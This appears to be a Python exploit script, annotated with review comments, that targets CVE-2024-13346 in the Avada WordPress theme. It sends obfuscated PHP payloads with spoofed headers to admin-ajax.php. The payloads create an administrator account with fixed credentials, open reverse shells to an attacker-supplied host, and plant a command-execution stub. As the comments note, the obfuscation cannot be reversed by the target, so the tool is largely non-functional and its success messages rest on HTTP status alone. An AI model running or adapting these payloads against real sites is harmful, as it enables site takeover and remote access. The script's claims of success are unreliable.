import requests
import urllib.parse
import base64
import random
import time
from cryptography.fernet import Fernet
import urllib3
# Silences urllib3's InsecureRequestWarning, which `session.verify = False`
# (set in WafBypasser.__init__) would otherwise emit on every request.
# NOTE(review): this call hides *all* urllib3 warnings, not just that one, and
# with certificate verification off the operator's own traffic (including the
# credentials and shell payloads below) is readable by anyone on the path.
urllib3.disable_warnings()
# Logo and Developer Info
def display_banner() -> None:
    """Write the ASCII-art logo, the CVE tag embedded in it, and the credits to stdout."""
    logo = """
_____ ___ _____ _ _ _
|_ _/ | | ___| | | (_) |
| |/ /| | | |____ ___ __ | | ___ _| |_
| / /_| | | __\ \/ / '_ \| |/ _ \| | __|
| \___ | | |___> <| |_) | | (_) | | |_
\_/ |_/ \____/_/\_\ .__/|_|\___/|_|\__|
| | CVE-2024-13346
|_|
"""
    print(logo)
    # Each entry is printed on its own line; the trailing "\n" in the last two
    # reproduces the blank line that followed them in the original output.
    credits = (
        "Advanced Avada Theme < 7.11.14 - Unauthenticated Arbitrary Shortcode Execution ",
        "Developer: Tausif Zaman\n",
        "instagram: @_tausif_zaman\n",
    )
    for line in credits:
        print(line)
USER_AGENTS = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Googlebot/2.1 (+http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm)'
]
HEADERS_TEMPLATE = {
'X-Forwarded-For': '127.0.0.1',
'Client-IP': '8.8.8.8',
'Referer': '{target}/',
'X-Requested-With': 'XMLHttpRequest'
}
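class WafBypasser:
    """Build and send obfuscated requests to a WordPress target's admin-ajax.php.

    What this class actually does: the caller's payload is passed through 2-3
    randomly chosen *local* transforms, split into chunks under randomly named
    parameters, and sent with a random ``fusion_*`` action name, a random
    32-hex-character ``security`` value, spoofed client-IP headers and a
    rotating User-Agent. No key material, transform order or decoding hint is
    ever transmitted, so a remote endpoint has no way to undo the Fernet layer,
    and nothing here checks whether the target understood the request. In
    practice it is a request-noise generator rather than a working bypass.

    Change from the original: every request now carries a timeout (see
    ``__init__``), so a silently dropped connection no longer hangs the caller.
    """

    _ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

    def __init__(self, target: str, *, timeout: float = 15.0) -> None:
        """Create a session bound to ``target``.

        ``target`` is used verbatim as the URL prefix; a trailing slash produces
        a ``//wp-admin`` path. ``timeout`` (seconds) bounds each request.
        """
        self.target = target
        self.timeout = timeout
        self.session = requests.Session()
        # Certificate verification is disabled: the session will accept any
        # certificate, so the traffic can be intercepted on the way to the target.
        self.session.verify = False
        # Fixed, hard-coded key (32 'x' bytes). It exists only in this process,
        # so anything encrypted with it cannot be decrypted by the receiver.
        self.fernet = Fernet(base64.urlsafe_b64encode(b'x' * 32))
        # Random prefix shared by all fragment parameter names of this instance.
        self.junk = self.generate_junk()

    def generate_junk(self) -> str:
        """Return 10-20 random ASCII letters, used as parameter-name/value noise."""
        return ''.join(random.choices(self._ALPHABET, k=random.randint(10, 20)))

    def polymorphic_obfuscate(self, payload: str) -> str:
        """Apply 2-3 randomly chosen encodings in sequence and return the result.

        Available transforms: base64, per-character ``%XX`` encoding (of every
        character, alphanumerics included), Fernet encryption under the fixed
        local key, and string reversal. The chosen sequence is not recorded
        anywhere, so the output is not reversible by anyone who did not observe
        this process.
        """
        transforms = [
            lambda x: base64.b64encode(x.encode()).decode(),
            lambda x: ''.join(f'%{ord(c):02x}' for c in x),
            lambda x: self.fernet.encrypt(x.encode()).decode(),
            lambda x: x[::-1],  # reverse string
        ]
        for _ in range(random.randint(2, 3)):
            payload = random.choice(transforms)(payload)
        return payload

    def fragment_payload(self, payload: str) -> dict[str, str]:
        """Split ``payload`` into fixed-size chunks (size drawn once from 5-15).

        Keys are ``<junk>_<index>``, so the chunk order is recoverable from the
        key suffix. An empty payload yields an empty dict.
        """
        chunk_size = random.randint(5, 15)
        return {
            f'{self.junk}_{i // chunk_size}': payload[i:i + chunk_size]
            for i in range(0, len(payload), chunk_size)
        }

    def generate_headers(self) -> dict[str, str]:
        """Return HEADERS_TEMPLATE with a random User-Agent and the Referer filled in.

        The X-Forwarded-For / Client-IP values are only meaningful if the
        target trusts those headers, which this code does not establish.
        """
        headers = HEADERS_TEMPLATE.copy()
        headers.update({
            'User-Agent': random.choice(USER_AGENTS),
            'Referer': headers['Referer'].format(target=self.target),
        })
        return headers

    def stealth_request(self, payload: str) -> "requests.Response":
        """Send ``payload``, obfuscated and fragmented, to ``<target>/wp-admin/admin-ajax.php``.

        The ``action`` parameter is one of three ``fusion_*`` spellings chosen at
        random; whether any of them is an AJAX action registered on the target
        is not checked. ``security`` is 32 random hex characters, not a nonce
        obtained from the target. 3-7 extra random key/value pairs are added,
        and GET (query string) vs POST (form body) is chosen at random.

        Returns the raw response. Callers must inspect it themselves: an HTTP
        200 from admin-ajax.php is not evidence that the payload was processed.
        Requests exceptions, including ``Timeout`` after ``self.timeout``
        seconds, propagate unchanged.
        """
        url = f"{self.target}/wp-admin/admin-ajax.php"
        action = random.choice(['fusion_ajax', 'fusion_ajx', 'fusion_ax'])
        fragmented = self.fragment_payload(self.polymorphic_obfuscate(payload))
        params = {
            action: '1',
            'security': ''.join(random.choices('abcdef0123456789', k=32)),
            **fragmented,
        }
        for _ in range(random.randint(3, 7)):
            params[self.generate_junk()] = self.generate_junk()
        headers = self.generate_headers()
        if random.choice([True, False]):
            return self.session.get(url, headers=headers, params=params, timeout=self.timeout)
        return self.session.post(url, headers=headers, data=params, timeout=self.timeout)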
def create_admin(target: str, username: str, password: str) -> bool:
    """Send three PHP snippets that would each create an administrator account.

    Each snippet is wrapped in ``<?php ... ?>`` and handed to
    ``WafBypasser.stealth_request``, which runs it through local-only transforms
    (including Fernet encryption under a key that never leaves this process)
    before sending it to admin-ajax.php. Nothing here shows that the target can
    recover, let alone execute, the snippet.

    NOTE(review): "success" is ``response.status_code == 200`` and nothing else;
    the response body is never inspected, so the ``[+] Admin user ... created!``
    message is not evidence that an account exists. ``username`` and
    ``password`` are interpolated into single-quoted PHP strings without
    escaping, so a quote or backslash in either breaks the snippet. The third
    variant registers ``<username>@example.com`` as the account e-mail.

    Returns True on the first 200 response, False after all variants fail.
    Sleeps 1-3 s between attempts; requests exceptions propagate.
    """
    bypasser = WafBypasser(target)
    payload_variants = [
        f"wp_insert_user(array('user_login'=>'{username}','user_pass'=>'{password}','role'=>'administrator'));",
        f"$u = new WP_User(0); $u->set_role('administrator'); $u->user_login = '{username}'; $u->user_pass = '{password}'; wp_insert_user($u);",
        f"require_once(ABSPATH.'wp-admin/includes/user.php'); wp_create_user('{username}','{password}','{username}@example.com'); $u = get_user_by('login','{username}'); $u->set_role('administrator');"
    ]
    for i, payload in enumerate(payload_variants):
        print(f"Attempting admin creation (method {i+1})...")
        php_code = f"<?php {payload} ?>"
        response = bypasser.stealth_request(php_code)
        # Status-only check: a 200 does not mean the PHP ran (see docstring).
        if response.status_code == 200:
            print(f"[+] Admin user {username} created!")
            return True
        time.sleep(random.uniform(1,3))
    return False
def reverse_shell(target: str, lhost: str, lport: str) -> bool:
    """Send four PHP snippets intended to give the operator a shell on ``target``.

    ``lhost``/``lport`` are interpolated into the PHP as-is (no validation or
    escaping). Only the first two snippets actually connect back to
    ``lhost:lport``: the third writes a command-execution stub to ``/tmp/f``,
    a path outside any web root, so it is not reachable over HTTP even if it
    were written (the ``chmod 0777`` does not change that); the fourth spawns
    ``/bin/sh`` with local pipes and never references ``lhost`` or ``lport``.

    NOTE(review): as in ``create_admin``, "triggered" means only that
    ``response.status_code == 200``; the body is not inspected and no listener
    check is performed, so the success message is not evidence of a shell.
    The snippets pass through ``WafBypasser.stealth_request``'s local-only
    obfuscation, which the target has no key to reverse.

    Returns True on the first 200 response, False otherwise. Sleeps 1-3 s
    between attempts; requests exceptions propagate.
    """
    bypasser = WafBypasser(target)
    payloads = [
        f"$s=fsockopen('{lhost}',{lport});exec('/bin/sh -i <&3 >&3 2>&3');",
        f"system('bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\"');",
        f"file_put_contents('/tmp/f', '<?php passthru($_GET[\"c\"]);?>'); chmod('/tmp/f',0777);",
        f"$p=array(array('pipe','r'),array('pipe','w'),array('pipe','w'));proc_open('/bin/sh',$p,$pipes);"
    ]
    for i, payload in enumerate(payloads):
        print(f"Attempting reverse shell (method {i+1})...")
        php_code = f"<?php {payload} ?>"
        response = bypasser.stealth_request(php_code)
        # Status-only check: a 200 does not mean any of the PHP ran.
        if response.status_code == 200:
            print("[+] Reverse shell triggered!")
            return True
        time.sleep(random.uniform(1,3))
    return False
if __name__ == "__main__":
    display_banner()
    # No normalisation or validation of the target: a trailing slash yields a
    # "//wp-admin/admin-ajax.php" path, and a bare host without a scheme is
    # passed straight to requests.
    target_url = input("[?] Enter Target URL: ").strip()
    lhost = input("[?] Enter Attacker IP: ").strip()
    # Kept as a string and interpolated into PHP verbatim by reverse_shell.
    lport = input("[?] Enter Attacker Port: ").strip()
    # NOTE(review): fixed, publicly known credentials. If this account were
    # ever created, anyone who has read this script could log in with it.
    username = "wpadmin"
    password = "P@ssw0rd!123"
    print("\n[*] Starting advanced WAF bypass sequence...\n")
    # Both "succeeded" branches below only mean that an HTTP 200 was observed;
    # neither create_admin nor reverse_shell inspects the response body.
    if create_admin(target_url, username, password):
        print("[+] Admin creation succeeded!")
    else:
        print("[-] Admin creation failed after multiple attempts")
    # The reverse-shell stage runs regardless of whether admin creation
    # reported success; it is skipped only when either prompt was left empty.
    if lhost and lport:
        print("[*] Attempting reverse shell...\n")
        if reverse_shell(target_url, lhost, lport):
            print("[+] Reverse shell succeeded!")
        else:
            print("[-] Reverse shell failed after multiple attempts")